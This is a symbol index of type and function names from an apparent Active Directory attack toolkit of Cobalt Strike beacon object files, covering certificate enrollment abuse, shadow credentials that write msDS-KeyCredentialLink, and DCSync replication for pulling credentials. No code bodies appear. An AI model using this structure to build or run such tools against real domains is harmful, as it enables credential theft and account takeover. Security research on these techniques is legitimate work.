type EnrollmentDisplayStatus (line 3181) | typedef
type IX509EnrollmentStatusVtbl (line 3249) | typedef struct IX509EnrollmentStatusVtbl
function interface (line 3353) | interface IX509EnrollmentStatus
type X509ProviderType (line 3436) | typedef
type AlgorithmType (line 3466) | typedef
type AlgorithmOperationFlags (line 3478) | typedef
type ICspAlgorithmVtbl (line 3552) | typedef struct ICspAlgorithmVtbl
function interface (line 3650) | interface ICspAlgorithm
type ICspAlgorithmsVtbl (line 3770) | typedef struct ICspAlgorithmsVtbl
function interface (line 3860) | interface ICspAlgorithms
type X509KeySpec (line 3931) | typedef
type ICspInformationVtbl (line 4022) | typedef struct ICspInformationVtbl
function interface (line 4151) | interface ICspInformation
type ICspInformationsVtbl (line 4308) | typedef struct ICspInformationsVtbl
function interface (line 4418) | interface ICspInformations
type ICspStatusVtbl (line 4540) | typedef struct ICspStatusVtbl
function interface (line 4625) | interface ICspStatus
type ICspStatusesVtbl (line 4747) | typedef struct ICspStatusesVtbl
function interface (line 4850) | interface ICspStatuses
type KeyIdentifierHashAlgorithm (line 4927) | typedef
type IX509PublicKeyVtbl (line 4991) | typedef struct IX509PublicKeyVtbl
function interface (line 5083) | interface IX509PublicKey
type X509PrivateKeyExportFlags (line 5151) | typedef
type X509PrivateKeyUsageFlags (line 5161) | typedef
type X509PrivateKeyProtection (line 5171) | typedef
type X509PrivateKeyVerify (line 5181) | typedef
type IX509PrivateKeyVtbl (line 5392) | typedef struct IX509PrivateKeyVtbl
function interface (line 5682) | interface IX509PrivateKey
type X509HardwareKeyUsageFlags (line 5903) | typedef
type X509KeyParametersExportType (line 5915) | typedef
type IX509PrivateKey2Vtbl (line 5980) | typedef struct IX509PrivateKey2Vtbl
function interface (line 6312) | interface IX509PrivateKey2
type IX509EndorsementKeyVtbl (line 6618) | typedef struct IX509EndorsementKeyVtbl
function interface (line 6722) | interface IX509EndorsementKey
type IX509ExtensionVtbl (line 6837) | typedef struct IX509ExtensionVtbl
function interface (line 6916) | interface IX509Extension
type IX509ExtensionsVtbl (line 7020) | typedef struct IX509ExtensionsVtbl
function interface (line 7109) | interface IX509Extensions
type X509KeyUsageFlags (line 7180) | typedef
type IX509ExtensionKeyUsageVtbl (line 7231) | typedef struct IX509ExtensionKeyUsageVtbl
function interface (line 7323) | interface IX509ExtensionKeyUsage
type IX509ExtensionEnhancedKeyUsageVtbl (line 7422) | typedef struct IX509ExtensionEnhancedKeyUsageVtbl
function interface (line 7514) | interface IX509ExtensionEnhancedKeyUsage
type IX509ExtensionTemplateNameVtbl (line 7613) | typedef struct IX509ExtensionTemplateNameVtbl
function interface (line 7705) | interface IX509ExtensionTemplateName
type IX509ExtensionTemplateVtbl (line 7812) | typedef struct IX509ExtensionTemplateVtbl
function interface (line 7914) | interface IX509ExtensionTemplate
type AlternativeNameType (line 7992) | typedef
type IAlternativeNameVtbl (line 8060) | typedef struct IAlternativeNameVtbl
function interface (line 8151) | interface IAlternativeName
type IAlternativeNamesVtbl (line 8254) | typedef struct IAlternativeNamesVtbl
function interface (line 8334) | interface IAlternativeNames
type IX509ExtensionAlternativeNamesVtbl (line 8426) | typedef struct IX509ExtensionAlternativeNamesVtbl
function interface (line 8518) | interface IX509ExtensionAlternativeNames
type IX509ExtensionBasicConstraintsVtbl (line 8621) | typedef struct IX509ExtensionBasicConstraintsVtbl
function interface (line 8718) | interface IX509ExtensionBasicConstraints
type IX509ExtensionSubjectKeyIdentifierVtbl (line 8822) | typedef struct IX509ExtensionSubjectKeyIdentifierVtbl
function interface (line 8916) | interface IX509ExtensionSubjectKeyIdentifier
type IX509ExtensionAuthorityKeyIdentifierVtbl (line 9017) | typedef struct IX509ExtensionAuthorityKeyIdentifierVtbl
function interface (line 9111) | interface IX509ExtensionAuthorityKeyIdentifier
type ISmimeCapabilityVtbl (line 9210) | typedef struct ISmimeCapabilityVtbl
function interface (line 9279) | interface ISmimeCapability
type ISmimeCapabilitiesVtbl (line 9376) | typedef struct ISmimeCapabilitiesVtbl
function interface (line 9464) | interface ISmimeCapabilities
type IX509ExtensionSmimeCapabilitiesVtbl (line 9562) | typedef struct IX509ExtensionSmimeCapabilitiesVtbl
function interface (line 9654) | interface IX509ExtensionSmimeCapabilities
type PolicyQualifierType (line 9726) | typedef
type IPolicyQualifierVtbl (line 9777) | typedef struct IPolicyQualifierVtbl
function interface (line 9855) | interface IPolicyQualifier
type IPolicyQualifiersVtbl (line 9952) | typedef struct IPolicyQualifiersVtbl
function interface (line 10032) | interface IPolicyQualifiers
type ICertificatePolicyVtbl (line 10123) | typedef struct ICertificatePolicyVtbl
function interface (line 10191) | interface ICertificatePolicy
type ICertificatePoliciesVtbl (line 10282) | typedef struct ICertificatePoliciesVtbl
function interface (line 10362) | interface ICertificatePolicies
type IX509ExtensionCertificatePoliciesVtbl (line 10454) | typedef struct IX509ExtensionCertificatePoliciesVtbl
function interface (line 10546) | interface IX509ExtensionCertificatePolicies
type IX509ExtensionMSApplicationPoliciesVtbl (line 10645) | typedef struct IX509ExtensionMSApplicationPoliciesVtbl
function interface (line 10737) | interface IX509ExtensionMSApplicationPolicies
type IX509AttributeVtbl (line 10838) | typedef struct IX509AttributeVtbl
function interface (line 10909) | interface IX509Attribute
type IX509AttributesVtbl (line 11000) | typedef struct IX509AttributesVtbl
function interface (line 11080) | interface IX509Attributes
type IX509AttributeExtensionsVtbl (line 11172) | typedef struct IX509AttributeExtensionsVtbl
function interface (line 11256) | interface IX509AttributeExtensions
type RequestClientInfoClientId (line 11322) | typedef
type IX509AttributeClientIdVtbl (line 11387) | typedef struct IX509AttributeClientIdVtbl
function interface (line 11486) | interface IX509AttributeClientId
type IX509AttributeRenewalCertificateVtbl (line 11590) | typedef struct IX509AttributeRenewalCertificateVtbl
function interface (line 11676) | interface IX509AttributeRenewalCertificate
type IX509AttributeArchiveKeyVtbl (line 11780) | typedef struct IX509AttributeArchiveKeyVtbl
function interface (line 11877) | interface IX509AttributeArchiveKey
type IX509AttributeArchiveKeyHashVtbl (line 11978) | typedef struct IX509AttributeArchiveKeyHashVtbl
function interface (line 12064) | interface IX509AttributeArchiveKeyHash
type IX509AttributeOSVersionVtbl (line 12157) | typedef struct IX509AttributeOSVersionVtbl
function interface (line 12241) | interface IX509AttributeOSVersion
type IX509AttributeCspProviderVtbl (line 12344) | typedef struct IX509AttributeCspProviderVtbl
function interface (line 12440) | interface IX509AttributeCspProvider
type ICryptAttributeVtbl (line 12541) | typedef struct ICryptAttributeVtbl
function interface (line 12613) | interface ICryptAttribute
type ICryptAttributesVtbl (line 12714) | typedef struct ICryptAttributesVtbl
function interface (line 12803) | interface ICryptAttributes
type CERTENROLL_PROPERTYID (line 12874) | typedef
type ICertPropertyVtbl (line 13033) | typedef struct ICertPropertyVtbl
function interface (line 13125) | interface ICertProperty
type ICertPropertiesVtbl (line 13233) | typedef struct ICertPropertiesVtbl
function interface (line 13319) | interface ICertProperties
type ICertPropertyFriendlyNameVtbl (line 13410) | typedef struct ICertPropertyFriendlyNameVtbl
function interface (line 13510) | interface ICertPropertyFriendlyName
type ICertPropertyDescriptionVtbl (line 13608) | typedef struct ICertPropertyDescriptionVtbl
function interface (line 13708) | interface ICertPropertyDescription
type ICertPropertyAutoEnrollVtbl (line 13806) | typedef struct ICertPropertyAutoEnrollVtbl
function interface (line 13906) | interface ICertPropertyAutoEnroll
type ICertPropertyRequestOriginatorVtbl (line 14006) | typedef struct ICertPropertyRequestOriginatorVtbl
function interface (line 14109) | interface ICertPropertyRequestOriginator
type ICertPropertySHA1HashVtbl (line 14212) | typedef struct ICertPropertySHA1HashVtbl
function interface (line 14314) | interface ICertPropertySHA1Hash
type ICertPropertyKeyProvInfoVtbl (line 14412) | typedef struct ICertPropertyKeyProvInfoVtbl
function interface (line 14512) | interface ICertPropertyKeyProvInfo
type ICertPropertyArchivedVtbl (line 14610) | typedef struct ICertPropertyArchivedVtbl
function interface (line 14710) | interface ICertPropertyArchived
type ICertPropertyBackedUpVtbl (line 14815) | typedef struct ICertPropertyBackedUpVtbl
function interface (line 14924) | interface ICertPropertyBackedUp
type ICertPropertyEnrollmentVtbl (line 15040) | typedef struct ICertPropertyEnrollmentVtbl
function interface (line 15155) | interface ICertPropertyEnrollment
type ICertPropertyRenewalVtbl (line 15269) | typedef struct ICertPropertyRenewalVtbl
function interface (line 15377) | interface ICertPropertyRenewal
type ICertPropertyArchivedKeyHashVtbl (line 15480) | typedef struct ICertPropertyArchivedKeyHashVtbl
function interface (line 15582) | interface ICertPropertyArchivedKeyHash
type EnrollmentPolicyServerPropertyFlags (line 15657) | typedef
type PolicyServerUrlFlags (line 15664) | typedef
type ICertPropertyEnrollmentPolicyServerVtbl (line 15734) | typedef struct ICertPropertyEnrollmentPolicyServerVtbl
function interface (line 15869) | interface ICertPropertyEnrollmentPolicyServer
type IX509SignatureInformationVtbl (line 16024) | typedef struct IX509SignatureInformationVtbl
function interface (line 16135) | interface IX509SignatureInformation
type ISignerCertificateVtbl (line 16275) | typedef struct ISignerCertificateVtbl
function interface (line 16379) | interface ISignerCertificate
type ISignerCertificatesVtbl (line 16498) | typedef struct ISignerCertificatesVtbl
function interface (line 16583) | interface ISignerCertificates
type IX509NameValuePairVtbl (line 16678) | typedef struct IX509NameValuePairVtbl
function interface (line 16747) | interface IX509NameValuePair
type IX509NameValuePairsVtbl (line 16838) | typedef struct IX509NameValuePairsVtbl
function interface (line 16918) | interface IX509NameValuePairs
type EnrollmentTemplateProperty (line 16983) | typedef
type EnrollmentTemplateProperty (line 17040) | enum EnrollmentTemplateProperty
type IX509CertificateTemplateVtbl (line 17048) | typedef struct IX509CertificateTemplateVtbl
function interface (line 17109) | interface IX509CertificateTemplate
type IX509CertificateTemplatesVtbl (line 17202) | typedef struct IX509CertificateTemplatesVtbl
function interface (line 17292) | interface IX509CertificateTemplates
type CommitTemplateFlags (line 17363) | typedef
type EnrollmentTemplateProperty (line 17400) | enum EnrollmentTemplateProperty
type EnrollmentTemplateProperty (line 17404) | enum EnrollmentTemplateProperty
type IX509CertificateTemplateWritableVtbl (line 17415) | typedef struct IX509CertificateTemplateWritableVtbl
function interface (line 17494) | interface IX509CertificateTemplateWritable
type EnrollmentCAProperty (line 17556) | typedef
type EnrollmentCAProperty (line 17594) | enum EnrollmentCAProperty
type ICertificationAuthorityVtbl (line 17602) | typedef struct ICertificationAuthorityVtbl
function interface (line 17663) | interface ICertificationAuthority
type ICertificationAuthoritiesVtbl (line 17754) | typedef struct ICertificationAuthoritiesVtbl
function interface (line 17842) | interface ICertificationAuthorities
type X509EnrollmentPolicyLoadOption (line 17913) | typedef
type EnrollmentPolicyFlags (line 17923) | enum EnrollmentPolicyFlags
type PolicyServerUrlPropertyID (line 17928) | typedef
type X509EnrollmentPolicyExportFlags (line 17935) | typedef
type IX509EnrollmentPolicyServerVtbl (line 18048) | typedef struct IX509EnrollmentPolicyServerVtbl
function interface (line 18208) | interface IX509EnrollmentPolicyServer
type IX509PolicyServerUrlVtbl (line 18391) | typedef struct IX509PolicyServerUrlVtbl
function interface (line 18509) | interface IX509PolicyServerUrl
type IX509PolicyServerListManagerVtbl (line 18640) | typedef struct IX509PolicyServerListManagerVtbl
function interface (line 18725) | interface IX509PolicyServerListManager
type X509RequestType (line 18793) | typedef
type X509RequestInheritOptions (line 18803) | typedef
type InnerRequestLevel (line 18822) | typedef
type IX509CertificateRequestVtbl (line 18931) | typedef struct IX509CertificateRequestVtbl
function interface (line 19089) | interface IX509CertificateRequest
type Pkcs10AllowedSignatureTypes (line 19211) | typedef
type IX509CertificateRequestPkcs10Vtbl (line 19340) | typedef struct IX509CertificateRequestPkcs10Vtbl
function interface (line 19623) | interface IX509CertificateRequestPkcs10
type IX509CertificateRequestPkcs10V2Vtbl (line 19870) | typedef struct IX509CertificateRequestPkcs10V2Vtbl
function interface (line 20181) | interface IX509CertificateRequestPkcs10V2
type IX509CertificateRequestPkcs10V3Vtbl (line 20456) | typedef struct IX509CertificateRequestPkcs10V3Vtbl
function interface (line 20813) | interface IX509CertificateRequestPkcs10V3
type KeyAttestationClaimType (line 21070) | typedef
type IX509CertificateRequestPkcs10V4Vtbl (line 21117) | typedef struct IX509CertificateRequestPkcs10V4Vtbl
function interface (line 21490) | interface IX509CertificateRequestPkcs10V4
type IX509CertificateRequestCertificateVtbl (line 21812) | typedef struct IX509CertificateRequestCertificateVtbl
function interface (line 22141) | interface IX509CertificateRequestCertificate
type IX509CertificateRequestCertificate2Vtbl (line 22416) | typedef struct IX509CertificateRequestCertificate2Vtbl
function interface (line 22766) | interface IX509CertificateRequestCertificate2
type IX509CertificateRequestPkcs7Vtbl (line 23067) | typedef struct IX509CertificateRequestPkcs7Vtbl
function interface (line 23263) | interface IX509CertificateRequestPkcs7
type IX509CertificateRequestPkcs7V2Vtbl (line 23441) | typedef struct IX509CertificateRequestPkcs7V2Vtbl
function interface (line 23655) | interface IX509CertificateRequestPkcs7V2
type IX509CertificateRequestCmcVtbl (line 23907) | typedef struct IX509CertificateRequestCmcVtbl
function interface (line 24201) | interface IX509CertificateRequestCmc
type IX509CertificateRequestCmc2Vtbl (line 24458) | typedef struct IX509CertificateRequestCmc2Vtbl
function interface (line 24781) | interface IX509CertificateRequestCmc2
type InstallResponseRestrictionFlags (line 25017) | typedef
type IX509EnrollmentVtbl (line 25129) | typedef struct IX509EnrollmentVtbl
function interface (line 25286) | interface IX509Enrollment
type IX509Enrollment2Vtbl (line 25443) | typedef struct IX509Enrollment2Vtbl
function interface (line 25629) | interface IX509Enrollment2
type WebEnrollmentFlags (line 25761) | typedef
type IX509EnrollmentHelperVtbl (line 25816) | typedef struct IX509EnrollmentHelperVtbl
function interface (line 25900) | interface IX509EnrollmentHelper
type IX509EnrollmentWebClassFactoryVtbl (line 25980) | typedef struct IX509EnrollmentWebClassFactoryVtbl
function interface (line 26041) | interface IX509EnrollmentWebClassFactory
type IX509MachineEnrollmentFactoryVtbl (line 26112) | typedef struct IX509MachineEnrollmentFactoryVtbl
function interface (line 26173) | interface IX509MachineEnrollmentFactory
type CRLRevocationReason (line 26223) | typedef
type IX509CertificateRevocationListEntryVtbl (line 26287) | typedef struct IX509CertificateRevocationListEntryVtbl
function interface (line 26374) | interface IX509CertificateRevocationListEntry
type IX509CertificateRevocationListEntriesVtbl (line 26485) | typedef struct IX509CertificateRevocationListEntriesVtbl
function interface (line 26575) | interface IX509CertificateRevocationListEntries
type IX509CertificateRevocationListVtbl (line 26758) | typedef struct IX509CertificateRevocationListVtbl
function interface (line 26940) | interface IX509CertificateRevocationList
type ICertificateAttestationChallengeVtbl (line 27108) | typedef struct ICertificateAttestationChallengeVtbl
function interface (line 27178) | interface ICertificateAttestationChallenge
type ICertificateAttestationChallenge2Vtbl (line 27258) | typedef struct ICertificateAttestationChallenge2Vtbl
function interface (line 27337) | interface ICertificateAttestationChallenge2
type IX509SCEPEnrollmentVtbl (line 27499) | typedef struct IX509SCEPEnrollmentVtbl
function interface (line 27659) | interface IX509SCEPEnrollment
type X509SCEPProcessMessageFlags (line 27772) | typedef
type DelayRetryAction (line 27779) | typedef
type IX509SCEPEnrollment2Vtbl (line 27837) | typedef struct IX509SCEPEnrollment2Vtbl
function interface (line 28025) | interface IX509SCEPEnrollment2
type IX509SCEPEnrollmentHelperVtbl (line 28200) | typedef struct IX509SCEPEnrollmentHelperVtbl
function interface (line 28288) | interface IX509SCEPEnrollmentHelper
type X509CertificateTemplateGeneralFlag (line 28357) | typedef
type X509CertificateTemplateEnrollmentFlag (line 28368) | typedef
type X509CertificateTemplateSubjectNameFlag (line 28392) | typedef
type X509CertificateTemplatePrivateKeyFlag (line 28410) | typedef
type ImportPFXFlags (line 29061) | typedef
type HRESULT (line 29080) | typedef HRESULT (FNIMPORTPFXTOPROVIDER)(
type VOID (line 29093) | typedef VOID (FNIMPORTPFXTOPROVIDERFREEDATA)(
FILE: AD-BOF/ADCS-BOF/src/request_on_behalf/entry.c
function HCERTSTORE (line 59) | HCERTSTORE LoadEnrollmentAgentCert(LPBYTE pbCert, DWORD cbCert, LPCWSTR ...
function HRESULT (line 118) | HRESULT RequestCertOnBehalf( LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPC...
function VOID (line 454) | VOID go( IN PCHAR Buffer, IN ULONG Length )
function main (line 494) | int main(int argc, char **argv)
FILE: AD-BOF/ADCS-BOF/src/shadow/certi_shadow.c
type WCHAR (line 18) | typedef WCHAR OLECHAR;
type OLECHAR (line 19) | typedef OLECHAR* LPOLESTR;
type OLECHAR (line 20) | typedef OLECHAR* BSTR;
type LONG (line 21) | typedef LONG DISPID;
type UINT (line 22) | typedef unsigned int UINT;
type berval (line 138) | struct berval
function EncodeLength (line 286) | static int EncodeLength(BYTE* buf, int len) {
function DecodeLength (line 311) | static int DecodeLength(BYTE* data, int offset, int* length) {
function BYTE (line 327) | static BYTE* BuildSequence(BYTE* content, int contentLen, int* outLen) {
function BYTE (line 340) | static BYTE* BuildInteger(int value, int* outLen) {
function BYTE (line 370) | static BYTE* BuildIntegerFromBytes(BYTE* data, int dataLen, int* outLen) {
function BYTE (line 391) | static BYTE* BuildOctetString(BYTE* data, int dataLen, int* outLen) {
function BYTE (line 404) | static BYTE* BuildBitString(BYTE* data, int dataLen, int* outLen) {
function BYTE (line 418) | static BYTE* BuildContextTag(int tagNum, BYTE* content, int contentLen, ...
function BYTE (line 431) | static BYTE* BuildApplication(int appNum, BYTE* content, int contentLen,...
function BYTE (line 444) | static BYTE* BuildGeneralString(const char* str, int* outLen) {
function BYTE (line 458) | static BYTE* BuildGeneralizedTime(const char* timeStr, int* outLen) {
function BOOL (line 475) | static BOOL ComputeSha256(BYTE* data, int dataLen, BYTE* hash) {
function ComputeSha1 (line 495) | static void ComputeSha1(BYTE* data, int dataLen, BYTE* hash) {
function BYTE (line 515) | static BYTE* BuildKeyCredentialEntry(BYTE identifier, BYTE* data, int da...
function BYTE (line 527) | static BYTE* BuildKeyCredentialBlob(BYTE* publicKey, int publicKeyLen, G...
function BYTE (line 622) | static BYTE* ExportRSAPublicKeyBCrypt(HCRYPTKEY hKey, int* outLen) {
function DeobfuscateW (line 684) | static void DeobfuscateW(WCHAR* str, int len) {
function DeobfuscateA (line 692) | static void DeobfuscateA(char* str, int len) {
function GetObfuscatedStrings (line 700) | static void GetObfuscatedStrings(WCHAR* samAccountName, WCHAR* distingui...
function BOOL (line 738) | static BOOL LookupUserDNAndSID(const char* szTarget, const char* szDomain,
function BOOL (line 872) | static BOOL WriteKeyCredentialLink(const char* szDomain, WCHAR* wszTarge...
function BOOL (line 963) | static BOOL DeleteKeyCredentialLink(const char* szDomain, WCHAR* wszTarg...
function BOOL (line 1026) | static BOOL ClearKeyCredentialLink(const char* szDomain, WCHAR* wszTarge...
function BYTE (line 1095) | static BYTE* GenerateCertificateAndKey(const char* szCN, const char* szD...
function BYTE (line 1160) | static BYTE* BuildCertificateWithKey(HCRYPTPROV hProv, HCRYPTKEY hKey, c...
function go (line 1389) | void go(char* args, int alen)
FILE: AD-BOF/DCSync-BOF/_include/beacon.h
type datap (line 39) | typedef struct {
type formatp (line 54) | typedef struct {
type HEAP_RECORD (line 103) | typedef struct {
type ALLOCATED_MEMORY_PURPOSE (line 110) | typedef enum {
type ALLOCATED_MEMORY_LABEL (line 120) | typedef enum {
type ALLOCATED_MEMORY_ALLOCATION_METHOD (line 132) | typedef enum {
type HEAPALLOC_INFO (line 149) | typedef struct _HEAPALLOC_INFO {
type MODULESTOMP_INFO (line 154) | typedef struct _MODULESTOMP_INFO {
type ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION (line 158) | typedef union _ALLOCATED_MEMORY_ADDITIONAL_CLEANUP_INFORMATION {
type ALLOCATED_MEMORY_CLEANUP_INFORMATION (line 164) | typedef struct _ALLOCATED_MEMORY_CLEANUP_INFORMATION {
type ALLOCATED_MEMORY_SECTION (line 170) | typedef struct _ALLOCATED_MEMORY_SECTION {
type ALLOCATED_MEMORY_REGION (line 180) | typedef struct _ALLOCATED_MEMORY_REGION {
type ALLOCATED_MEMORY (line 190) | typedef struct {
type BEACON_INFO (line 218) | typedef struct {
type DATA_STORE_OBJECT (line 265) | typedef struct {
type SYSCALL_API_ENTRY (line 283) | typedef struct
type SYSCALL_API (line 290) | typedef struct
type RTL_API (line 337) | typedef struct
type BEACON_SYSCALLS (line 348) | typedef struct
type USER_DATA (line 391) | typedef struct
FILE: AD-BOF/DCSync-BOF/_include/dcsync.h
type LONGLONG (line 34) | typedef LONGLONG DSTIME;
type NT4SID (line 37) | typedef struct {
type DSNAME (line 41) | typedef struct {
type LONGLONG (line 50) | typedef LONGLONG USN;
type USN_VECTOR (line 52) | typedef struct {
type UPTODATE_CURSOR_V1 (line 58) | typedef struct {
type UPTODATE_VECTOR_V1_EXT (line 63) | typedef struct {
type OID_t (line 71) | typedef struct {
type PrefixTableEntry (line 76) | typedef struct {
type SCHEMA_PREFIX_TABLE (line 81) | typedef struct {
type ULONG (line 86) | typedef ULONG ATTRTYP;
type PARTIAL_ATTR_VECTOR_V1_EXT (line 88) | typedef struct {
type ATTRVAL (line 95) | typedef struct {
type ATTRVALBLOCK (line 100) | typedef struct {
type ATTR (line 105) | typedef struct {
type ATTRBLOCK (line 110) | typedef struct {
type ENTINF (line 115) | typedef struct {
type REPLENTINFLIST (line 121) | typedef struct REPLENTINFLIST {
type DRS_EXTENSIONS (line 131) | typedef struct {
type DRS_EXTENSIONS_INT (line 136) | typedef struct {
type DRS_MSG_GETCHGREQ_V8 (line 145) | typedef struct {
type DRS_MSG_GETCHGREQ_V10 (line 162) | typedef struct {
type DRS_MSG_GETCHGREPLY_V1 (line 179) | typedef struct {
type DRS_MSG_GETCHGREPLY_V6 (line 195) | typedef struct {
type DRS_MSG_GETCHGREQ (line 215) | typedef union {
type DRS_MSG_GETCHGREPLY (line 220) | typedef union {
type CLIENT_CALL_RETURN (line 230) | typedef union _CLIENT_CALL_RETURN {
type SecHandle (line 236) | typedef struct _SecHandle {
type SecHandle (line 241) | typedef SecHandle CtxtHandle;
type SecHandle (line 242) | typedef SecHandle *PSecHandle;
type PSecHandle (line 243) | typedef PSecHandle PCtxtHandle;
type SecPkgContext_SessionKey (line 245) | typedef struct _SecPkgContext_SessionKey {
type ENCRYPTED_PAYLOAD (line 250) | typedef struct _ENCRYPTED_PAYLOAD {
FILE: AD-BOF/DCSync-BOF/_include/ldap_common.h
type LDAP (line 7) | typedef struct ldap {
type LDAP_BERVAL (line 31) | typedef struct berval {
type BerElement (line 36) | typedef struct berelement {
type LDAPModA (line 40) | typedef struct ldapmodA {
type LDAPControlA (line 49) | typedef struct ldapcontrolA {
type LDAPMessage (line 55) | typedef struct ldapmsg {
type BOOLEAN (line 117) | typedef BOOLEAN (*VERIFYSERVERCERT)(PLDAP Connection, PCCERT_CONTEXT pSe...
type DOMAIN_CONTROLLER_INFOA (line 157) | typedef struct _DOMAIN_CONTROLLER_INFOA {
type berval (line 203) | struct berval
type USER_LDAP_INFO (line 206) | typedef struct _USER_LDAP_INFO {
type DC_CONTEXT (line 213) | typedef struct _DC_CONTEXT {
FILE: AD-BOF/DCSync-BOF/drsuapi/ms-drsr-custom.c
type ms2Ddrsr_MIDL_TYPE_FORMAT_STRING (line 27) | typedef struct _ms2Ddrsr_MIDL_TYPE_FORMAT_STRING {
type ms2Ddrsr_MIDL_PROC_FORMAT_STRING (line 32) | typedef struct _ms2Ddrsr_MIDL_PROC_FORMAT_STRING {
function ULONG (line 62) | ULONG IDL_DRSBind(
function ULONG (line 76) | ULONG IDL_DRSUnbind(DRS_HANDLE *phDrs)
function ULONG (line 85) | ULONG IDL_DRSReplicaSync(
function ULONG (line 97) | ULONG IDL_DRSGetNCChanges(
FILE: AD-BOF/DCSync-BOF/drsuapi/ms-drsr.h
type RPC_UNICODE_STRING (line 62) | typedef struct _RPC_UNICODE_STRING {
type LONGLONG (line 68) | typedef LONGLONG DSTIME;
type NT4SID (line 72) | typedef /* */ struct __MIDL_drsuapi_0001
type DSNAME (line 77) | typedef /* */ struct __MIDL_drsuapi_0002
type LONGLONG (line 87) | typedef LONGLONG USN;
type USN_VECTOR (line 89) | typedef /* */ struct __MIDL_drsuapi_0003
type UPTODATE_CURSOR_V1 (line 96) | typedef /* */ struct __MIDL_drsuapi_0004
type UPTODATE_VECTOR_V1_EXT (line 102) | typedef /* */ struct __MIDL_drsuapi_0005
type OID_t (line 111) | typedef /* */ struct __MIDL_drsuapi_0006
type PrefixTableEntry (line 117) | typedef /* */ struct __MIDL_drsuapi_0007
type SCHEMA_PREFIX_TABLE (line 123) | typedef /* */ struct __MIDL_drsuapi_0008
type ULONG (line 129) | typedef ULONG ATTRTYP;
type PARTIAL_ATTR_VECTOR_V1_EXT (line 131) | typedef /* */ struct __MIDL_drsuapi_0009
type MTX_ADDR (line 139) | typedef /* */ struct __MIDL_drsuapi_0010
type ATTRVAL (line 145) | typedef /* */ struct __MIDL_drsuapi_0011
type ATTRVALBLOCK (line 151) | typedef /* */ struct __MIDL_drsuapi_0012
type ATTR (line 157) | typedef /* */ struct __MIDL_drsuapi_0013
type ATTRBLOCK (line 163) | typedef /* */ struct __MIDL_drsuapi_0014
type ENTINF (line 169) | typedef /* */ struct __MIDL_drsuapi_0015
type PROPERTY_META_DATA_EXT (line 176) | typedef /* */ struct __MIDL_drsuapi_0016
type PROPERTY_META_DATA_EXT_VECTOR (line 184) | typedef /* */ struct __MIDL_drsuapi_0017
type REPLENTINFLIST (line 190) | typedef struct REPLENTINFLIST
type UPTODATE_CURSOR_V2 (line 199) | typedef /* */ struct __MIDL_drsuapi_0018
type UPTODATE_VECTOR_V2_EXT (line 206) | typedef /* */ struct __MIDL_drsuapi_0019
type VALUE_META_DATA_EXT_V1 (line 215) | typedef /* */ struct __MIDL_drsuapi_0020
type VALUE_META_DATA_EXT_V3 (line 221) | typedef /* */ struct __MIDL_drsuapi_0021
type REPLVALINF_V1 (line 231) | typedef /* */ struct __MIDL_drsuapi_0022
type REPLVALINF_V3 (line 240) | typedef /* */ struct __MIDL_drsuapi_0023
type REPLTIMES (line 249) | typedef /* */ struct __MIDL_drsuapi_0024
type DS_NAME_RESULT_ITEMW (line 254) | typedef /* */ struct __MIDL_drsuapi_0025
type __MIDL_drsuapi_0025 (line 261) | struct __MIDL_drsuapi_0025
type DS_NAME_RESULTW (line 263) | typedef /* */ struct __MIDL_drsuapi_0026
type __MIDL_drsuapi_0026 (line 269) | struct __MIDL_drsuapi_0026
type DS_DOMAIN_CONTROLLER_INFO_1W (line 271) | typedef /* */ struct __MIDL_drsuapi_0027
type DS_DOMAIN_CONTROLLER_INFO_2W (line 282) | typedef /* */ struct __MIDL_drsuapi_0028
type DS_DOMAIN_CONTROLLER_INFO_3W (line 300) | typedef /* */ struct __MIDL_drsuapi_0029
type DS_DOMAIN_CONTROLLER_INFO_FFFFFFFFW (line 319) | typedef /* */ struct __MIDL_drsuapi_0030
type ENTINFLIST (line 330) | typedef struct ENTINFLIST
type INTFORMPROB_DRS_WIRE_V1 (line 336) | typedef /* */ struct __MIDL_drsuapi_0031
type PROBLEMLIST_DRS_WIRE_V1 (line 347) | typedef struct _PROBLEMLIST_DRS_WIRE_V1
type ATRERR_DRS_WIRE_V1 (line 353) | typedef /* */ struct __MIDL_drsuapi_0032
type NAMERR_DRS_WIRE_V1 (line 360) | typedef /* */ struct __MIDL_drsuapi_0033
type NAMERESOP_DRS_WIRE_V1 (line 369) | typedef /* */ struct __MIDL_drsuapi_0034
type DSA_ADDRESS_LIST_DRS_WIRE_V1 (line 376) | typedef struct _DSA_ADDRESS_LIST_DRS_WIRE_V1
type CONTREF_DRS_WIRE_V1 (line 382) | typedef struct CONTREF_DRS_WIRE_V1
type REFERR_DRS_WIRE_V1 (line 396) | typedef /* */ struct __MIDL_drsuapi_0035
type SECERR_DRS_WIRE_V1 (line 404) | typedef /* */ struct __MIDL_drsuapi_0036
type SVCERR_DRS_WIRE_V1 (line 412) | typedef /* */ struct __MIDL_drsuapi_0037
type UPDERR_DRS_WIRE_V1 (line 420) | typedef /* */ struct __MIDL_drsuapi_0038
type SYSERR_DRS_WIRE_V1 (line 428) | typedef /* */ struct __MIDL_drsuapi_0039
type DIRERR_DRS_WIRE_V1 (line 436) | typedef /* [switch_type] */ union __MIDL_drsuapi_0040
type DS_REPL_NEIGHBORW (line 447) | typedef /* */ struct __MIDL_drsuapi_0041
type DS_REPL_NEIGHBORSW (line 467) | typedef /* */ struct __MIDL_drsuapi_0042
type DS_REPL_CURSOR (line 474) | typedef /* */ struct __MIDL_drsuapi_0043
type DS_REPL_CURSORS (line 480) | typedef /* */ struct __MIDL_drsuapi_0044
type DS_REPL_ATTR_META_DATA (line 487) | typedef /* */ struct __MIDL_drsuapi_0045
type DS_REPL_KCC_DSA_FAILUREW (line 497) | typedef /* */ struct __MIDL_drsuapi_0046
type DS_REPL_KCC_DSA_FAILURESW (line 506) | typedef /* */ struct __MIDL_drsuapi_0047
type DS_REPL_OBJ_META_DATA (line 513) | typedef /* */ struct __MIDL_drsuapi_0048
type DS_REPL_OP_TYPE (line 520) | typedef /* */
type DS_REPL_OPW (line 530) | typedef /* */ struct __MIDL_drsuapi_0050
type DS_REPL_PENDING_OPSW (line 544) | typedef /* */ struct __MIDL_drsuapi_0051
type DS_REPL_VALUE_META_DATA (line 551) | typedef /* */ struct __MIDL_drsuapi_0052
type DS_REPL_ATTR_VALUE_META_DATA (line 566) | typedef /* */ struct __MIDL_drsuapi_0053
type DS_REPL_CURSOR_2 (line 573) | typedef /* */ struct __MIDL_drsuapi_0054
type DS_REPL_CURSORS_2 (line 580) | typedef /* */ struct __MIDL_drsuapi_0055
